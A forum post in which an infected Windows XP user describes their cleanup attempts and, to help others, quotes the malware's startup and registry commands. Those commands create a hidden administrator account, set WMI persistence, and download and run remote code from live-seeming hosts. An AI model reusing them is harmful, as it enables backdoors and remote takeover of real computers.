I've been having fun for days wrestling with this, myself. I still don't think I've got it all.
First, and most importantly, before any reboot (even in Safe Mode), check MSCONFIG. In the StartUp tab, it keeps adding this;
regsvr32 /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
The URL doesn't actually work, but I don't think that's the point.
My theory is that this is actually a combination of viruses (in the general sense of the word, including worms, malware, rootkits, bootsector virusus, etc.). My further theory is that they all work together to keep each other activated, and/or reinstall, if one of them gets removed.
It disabled "Hibernate", and even the ability to turn it on.
More importantly, it completely disabled my MalwareBytes from even running. I'd click it, and it would not even appear in TaskManager. Reinstalled it to a different directory, uninstalled all of them - nothing worked. Even MBAM Chameloen would not work. That's some impressive work.
I tried a number of other anti-virus/anti-malware software, and the best I could get were "there are no more endpoints available from the endpoint mapper" errors. (Apparently, this has something to do with RPC, according to some scant research I've done.
Powershell is also involved, even though I don't think I have powershell on this infected XP laptop. Perhaps there's something like it? I found this in my research; https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535/
But I digress. Part of the merry-go-round were the following files that kept re-appearing;
C:\WINDOWS\system32\max.exe
C:\WINDOWS\system32\new.exe
C:\WINDOWS\TEMP\conhost.exe
and there was something in the C:\WINDOWS\inf directory.
Merely deleting them didn't work. Out of a kind desperation, I made zero-byte files of the same file names, assuming (correctly, as it turns out) that the virus could/would not overwrite them. This was not the final solution, but at least seemed to stop part of the merry-go-round of re-installation of other viral components. At least I could, in Safe Mode, get some other anti-virus software to start to chip away at the other pieces.
WMI (Windows Management Instrumentation) was another piece of this. I found this command somewhere in the registry. (Sorry I did not document where.) (Apologies for the language, but it's not mine.)
cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="*****youmm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="*****youmm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='*****youmm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="*****youmm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="*****youmm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="*****youmm3"", Consumer="CommandLineEventConsumer.Name="*****youmm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll
Some of those URLs don't work, but many of the IP-based ones do. (Shame on the hosting company that allows them to continue to work!)
This reminds me, part of the viruses create a new user named "admin$". Make sure not to log in using that. If it's the only option, reboot in SafeMode.
It is my strong belief that these viruses loaded onto my computer via a website advertisement. Time for me to invest in ad-blocking software.
I don't have a complete solution for you, since I'm not sure I've completely repaired my laptop, thus far - but at least I'm making progress. Ideally, some of what I've found so far can help someone more expert than myself try to tackle this.
